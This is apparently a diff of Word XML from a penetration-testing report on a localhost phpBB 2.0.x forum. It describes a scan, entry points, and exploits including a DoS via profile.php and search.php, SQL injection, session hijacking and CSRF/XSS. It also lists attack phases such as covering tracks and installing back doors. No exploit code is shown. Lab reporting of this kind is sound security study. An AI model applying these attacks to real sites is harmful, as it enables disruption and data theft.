+              <wp:posOffset>309245</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5724525" cy="3048000"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="2" name="Picture 2" descr="C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\acunetrixScan_localhost.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4" descr="C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\acunetrixScan_localhost.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5724525" cy="3048000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Figure.1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Results of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Acunetrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scan on </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>http://localhost/phpBB-2.0.23/phpBB2/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc446495292"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc446495761"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Entry points</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc446495293"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc446495762"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Apache Server</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>The h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ttp protocol is handle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> by the WAMP packages apache server. Any user attempting</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to connect will pass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> through this web server. It is the initial target of attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s attempting to carry out </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>DDOS or DOS attack as it manages http services.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>The server’s buffer can be exceeded by call</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> methods with a particular input that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>can overload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the buffer. This in turn can allow the user to access</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and manipulate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> arbitrary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> memory outside the scope of original method.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc446495294"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc446495763"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>PHP Functionality</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="11"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>The majority of 2.0 PHPBB versions house severe security weaknesses. These points of attack have been hardened by later and safer versions of PHP. There are many outdated and potentially unsecure versions of PHP still being used in systems today.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Injecting SQL statements into the server side language can potentially allow the h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>acker to retrieve sensitive data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>. Thi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>s form of attack is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> more difficult than a DOS attack but allows the hacker to target specific functionality of the site opposed to bringing it down.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc446495295"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc446495764"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Enumerating Exploits</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc446495296"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc446495765"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>DOS (Denial of service attack)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Denial of service is the most common form of attack and essentially looks to flood the server with resource intensive requests to deny services to its users.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> versions effected: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB_2.0.19 and below</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Vulnerability:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Infiltrate sensitive areas of the system or stop/deny services running.</w:t>
-      </w:r>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This exploit exhausts the user registration functionality of the site and performs malformed search queries that demand network resources. This exploit targets the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>profile.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>search.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> files that reside on the apache server. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Methods of execution: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Refer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nced in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Appendix of this report is a Perl script to perform the method of attack discussed above.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DOS (Denial of Service attack), </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.0.19. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>search.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>profile.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DOS Vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
+          <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Foot</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>printing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Scan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Enumerate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Penetrate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Attack</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Cover Tracks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Install Back Doors</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc446495297"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc446495766"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Heading3Char"/>
+          <w:b/>
           <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:spacing w:before="0"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc445123121"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>Method</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="0"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc445123122"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Foot-Printing</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>An analysis of the forum was carried using who.is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. This </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>delivered details of DNS and IP address details.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Other details such as security updates and software version expiry</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dates</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Session Hijacking exploit</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId9" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en"/>
-          </w:rPr>
-          <w:t>http://who.is/whois/http://localhost/phpbb-2.0.23/phpbb2/index.php</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Session Hijacking exploit - </w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
       </w:r>
       <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
@@ -1616,21 +2686,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="en"/>
           </w:rPr>
-          <w:t>https://cxsecurity.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en"/>
-          </w:rPr>
-          <w:t>c</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en"/>
-          </w:rPr>
-          <w:t>om/issue/WLB-2009090082</w:t>
+          <w:t>https://cxsecurity.com/issue/WLB-2009090082</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -1642,7 +2698,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
@@ -1656,15 +2711,13 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="18"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
@@ -1672,16 +2725,21 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>PhpBB 2.0.19 Cross Site Request Forgeries and XSS Admin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
+        <w:t>PhpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.0.19 Cross Site Request Forgeries and XSS Admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
@@ -1695,362 +2753,167 @@
           <w:t>http://joshduck.com/blog/2008/04/05/securing-your-php-code-xss/</w:t>
         </w:r>
       </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc446495298"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc446495767"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Penetration/Attack</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
+          <w:numId w:val="9"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
